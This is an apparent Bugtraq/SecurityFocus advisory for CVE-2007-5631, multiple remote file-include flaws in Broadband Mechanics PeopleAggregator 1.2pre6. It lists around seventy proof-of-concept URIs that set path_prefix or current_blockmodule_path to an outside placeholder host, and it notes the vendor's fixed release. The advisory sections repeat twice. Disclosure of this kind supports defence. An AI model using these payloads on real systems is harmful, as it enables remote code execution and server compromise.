Broadband Mechanics PeopleAggregator Multiple Remote File Include Vulnerabilities
BID:26147
Info
Broadband Mechanics PeopleAggregator Multiple Remote File Include Vulnerabilities
| Bugtraq ID: | 26147 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-5631 |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 21 2007 12:00AM |
| Updated: | Nov 15 2007 12:39AM |
| Credit: | GoLd_M discovered this vulnerability. |
| Vulnerable: |
Broadband Mechanics PeopleAggregator 1.2pre6 |
| Not Vulnerable: |
Broadband Mechanics PeopleAggregator 1.2pre6-release-55 |
Discussion
Broadband Mechanics PeopleAggregator Multiple Remote File Include Vulnerabilities
Broadband Mechanics PeopleAggregator is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
These issues affect PeopleAggregator 1.2pre6 and prior versions.
Broadband Mechanics PeopleAggregator is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
These issues affect PeopleAggregator 1.2pre6 and prior versions.
Exploit / POC
Broadband Mechanics PeopleAggregator Multiple Remote File Include Vulnerabilities
An attacker can exploit these issues via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/web/Flickrclient.php?path_prefix=http://www.example2.com
http://www.example.com/web/network_module_selector.php?path_prefix=http://www.example2.com
http://www.example.com/web/submit_abuse.php?path_prefix=http://www.example2.com
http://www.example.com/web/submit_comment.php?path_prefix=http://www.example2.com
http://www.example.com/web/Administration/Includes/configureText.php?path_prefix=http://www.example2.com
http://www.example.com/web/Administration/Includes/contentHome.php?path_prefix=http://www.example2.com
http://www.example.com/web/Administration/Includes/deleteContent.php?path_prefix=http://www.example2.com
http://www.example.com/web/Administration/Includes/deleteUser.php?path_prefix=http://www.example2.com
http://www.example.com/web/Administration/Includes/userHome.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/AboutUserModule/AboutUserModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/AddGroupModule/AddGroupModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/AddMessageModule/AddMessageModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/CustomizeUIModule/desktop_image.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/EditProfileModule/DynamicProfile.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/EditProfileModule/external.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/EnableModule/EnableModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/ExternalFeedModule/ExternalFeedModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/FlickrModule/FlickrModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/GroupForumModule/GroupForumModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/GroupForumPermalinkModule/GroupForumPermalinkModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/GroupModerateContentModule/GroupModerateContentModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/GroupModerateUserModule/GroupModerateUserModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/GroupModerationModule/GroupModerationModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/GroupsCategoryModule/GroupsCategoryModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/GroupsDirectoryModule/GroupsDirectoryModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/ImagesModule/ImagesModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/InvitationStatusModule/InvitationStatusModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/LargestGroupsModule/LargestGroupsModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/LinksModule/LinksModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/LoginModule/remoteauth_functions.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/LogoModule/LogoModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/MediaFullViewModule/MediaFullViewModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/MediaManagementModule/MediaManagementModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/MessageModule/MessageModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules//Module/Module.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/ModuleSelectorModule/ModuleSelectorModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/MyGroupsModule/MyGroupsModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/MyLinksModule/MyLinksModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/MyNetworksModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/NetworkAnnouncementModule/NetworkAnnouncementModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/NetworkDefaultControlModule/NetworkDefaultControlModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/NetworkDefaultLinksModule/NetworkDefaultLinksModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/NetworkModerateUserModule/NetworkModerateUserModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/NetworkResultContentModule/NetworkResultContentModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/NetworkResultUserModule/NetworkResultUserModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/NetworksDirectoryModule/NetworksDirectoryModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/PeopleModule/PeopleModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/PopularTagsModule/PopularTagsModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/PostContentModule/PostContentModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/ProfileFeedModule/ProfileFeedModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/RecentCommentsModule/RecentCommentsModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/RecentPostModule/RecentPostModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/RecentTagsModule/RecentTagsModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/RegisterModule/RegisterModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/SearchGroupsModule/SearchGroupsModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/ShowAnnouncementModule/ShowAnnouncementModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/ShowContentModule/ShowContentModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/TakerATourModule/TakerATourModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/UserMessagesModule/UserMessagesModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/UserPhotoModule/UserPhotoModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/ViewAllMembersModule/ViewAllMembersModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/includes/blogger.php?path_prefix=http://www.example2.com
http://www.example.com/web/includes/functions/auto_email_notify.php?path_prefix=http://www.example2.com
http://www.example.com/web/includes/functions/html_generate.php?path_prefix=http://www.example2.com
http://www.example.com/web/includes/functions/validations.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/AudiosMediaGalleryModule/AudiosMediaGalleryModule.php?current_blockmodule_path=http://www.example2.com
http://www.example.com/web/BetaBlockModules/ImagesMediaGalleryModule/ImagesMediaGalleryModule.php?current_blockmodule_path=http://www.example2.com
http://www.example.com/web/BetaBlockModules/MembersFacewallModule/MembersFacewallModule.php?current_blockmodule_path=http://www.example2.com
http://www.example.com/web/BetaBlockModules/NewestGroupsModule/NewestGroupsModule.php?current_blockmodule_path=http://www.example2.com
http://www.example.com/web/BetaBlockModules/UploadMediaModule/UploadMediaModule.php?current_blockmodule_path=http://www.example2.com
http://www.example.com/web/BetaBlockModules/VideosMediaGalleryModule/VideosMediaGalleryModule.php?current_blockmodule_path=http://www.example2.com
An attacker can exploit these issues via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/web/Flickrclient.php?path_prefix=http://www.example2.com
http://www.example.com/web/network_module_selector.php?path_prefix=http://www.example2.com
http://www.example.com/web/submit_abuse.php?path_prefix=http://www.example2.com
http://www.example.com/web/submit_comment.php?path_prefix=http://www.example2.com
http://www.example.com/web/Administration/Includes/configureText.php?path_prefix=http://www.example2.com
http://www.example.com/web/Administration/Includes/contentHome.php?path_prefix=http://www.example2.com
http://www.example.com/web/Administration/Includes/deleteContent.php?path_prefix=http://www.example2.com
http://www.example.com/web/Administration/Includes/deleteUser.php?path_prefix=http://www.example2.com
http://www.example.com/web/Administration/Includes/userHome.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/AboutUserModule/AboutUserModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/AddGroupModule/AddGroupModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/AddMessageModule/AddMessageModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/CustomizeUIModule/desktop_image.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/EditProfileModule/DynamicProfile.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/EditProfileModule/external.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/EnableModule/EnableModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/ExternalFeedModule/ExternalFeedModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/FlickrModule/FlickrModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/GroupForumModule/GroupForumModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/GroupForumPermalinkModule/GroupForumPermalinkModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/GroupModerateContentModule/GroupModerateContentModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/GroupModerateUserModule/GroupModerateUserModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/GroupModerationModule/GroupModerationModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/GroupsCategoryModule/GroupsCategoryModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/GroupsDirectoryModule/GroupsDirectoryModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/ImagesModule/ImagesModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/InvitationStatusModule/InvitationStatusModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/LargestGroupsModule/LargestGroupsModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/LinksModule/LinksModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/LoginModule/remoteauth_functions.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/LogoModule/LogoModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/MediaFullViewModule/MediaFullViewModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/MediaManagementModule/MediaManagementModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/MessageModule/MessageModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules//Module/Module.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/ModuleSelectorModule/ModuleSelectorModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/MyGroupsModule/MyGroupsModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/MyLinksModule/MyLinksModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/MyNetworksModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/NetworkAnnouncementModule/NetworkAnnouncementModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/NetworkDefaultControlModule/NetworkDefaultControlModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/NetworkDefaultLinksModule/NetworkDefaultLinksModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/NetworkModerateUserModule/NetworkModerateUserModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/NetworkResultContentModule/NetworkResultContentModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/NetworkResultUserModule/NetworkResultUserModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/NetworksDirectoryModule/NetworksDirectoryModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/PeopleModule/PeopleModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/PopularTagsModule/PopularTagsModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/PostContentModule/PostContentModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/ProfileFeedModule/ProfileFeedModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/RecentCommentsModule/RecentCommentsModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/RecentPostModule/RecentPostModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/RecentTagsModule/RecentTagsModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/RegisterModule/RegisterModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/SearchGroupsModule/SearchGroupsModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/ShowAnnouncementModule/ShowAnnouncementModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/ShowContentModule/ShowContentModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/TakerATourModule/TakerATourModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/UserMessagesModule/UserMessagesModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/UserPhotoModule/UserPhotoModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/ViewAllMembersModule/ViewAllMembersModule.php?path_prefix=http://www.example2.com
http://www.example.com/web/includes/blogger.php?path_prefix=http://www.example2.com
http://www.example.com/web/includes/functions/auto_email_notify.php?path_prefix=http://www.example2.com
http://www.example.com/web/includes/functions/html_generate.php?path_prefix=http://www.example2.com
http://www.example.com/web/includes/functions/validations.php?path_prefix=http://www.example2.com
http://www.example.com/web/BetaBlockModules/AudiosMediaGalleryModule/AudiosMediaGalleryModule.php?current_blockmodule_path=http://www.example2.com
http://www.example.com/web/BetaBlockModules/ImagesMediaGalleryModule/ImagesMediaGalleryModule.php?current_blockmodule_path=http://www.example2.com
http://www.example.com/web/BetaBlockModules/MembersFacewallModule/MembersFacewallModule.php?current_blockmodule_path=http://www.example2.com
http://www.example.com/web/BetaBlockModules/NewestGroupsModule/NewestGroupsModule.php?current_blockmodule_path=http://www.example2.com
http://www.example.com/web/BetaBlockModules/UploadMediaModule/UploadMediaModule.php?current_blockmodule_path=http://www.example2.com
http://www.example.com/web/BetaBlockModules/VideosMediaGalleryModule/VideosMediaGalleryModule.php?current_blockmodule_path=http://www.example2.com
Solution / Fix
Broadband Mechanics PeopleAggregator Multiple Remote File Include Vulnerabilities
Solution:
The vendor has released version 1.2pre6-release-55 to address this issue. Please see the references for more information.
Solution:
The vendor has released version 1.2pre6-release-55 to address this issue. Please see the references for more information.
References
Broadband Mechanics PeopleAggregator Multiple Remote File Include Vulnerabilities
References:
References:
- PeopleAggregator Homepage (Broadband Mechanics)
- PeopleAggregator security advisory for CVE-2007-5631 (Broadband Mechanics)
- PeopleAggregatory security advisory - re CVE-2007-5631 ([email protected])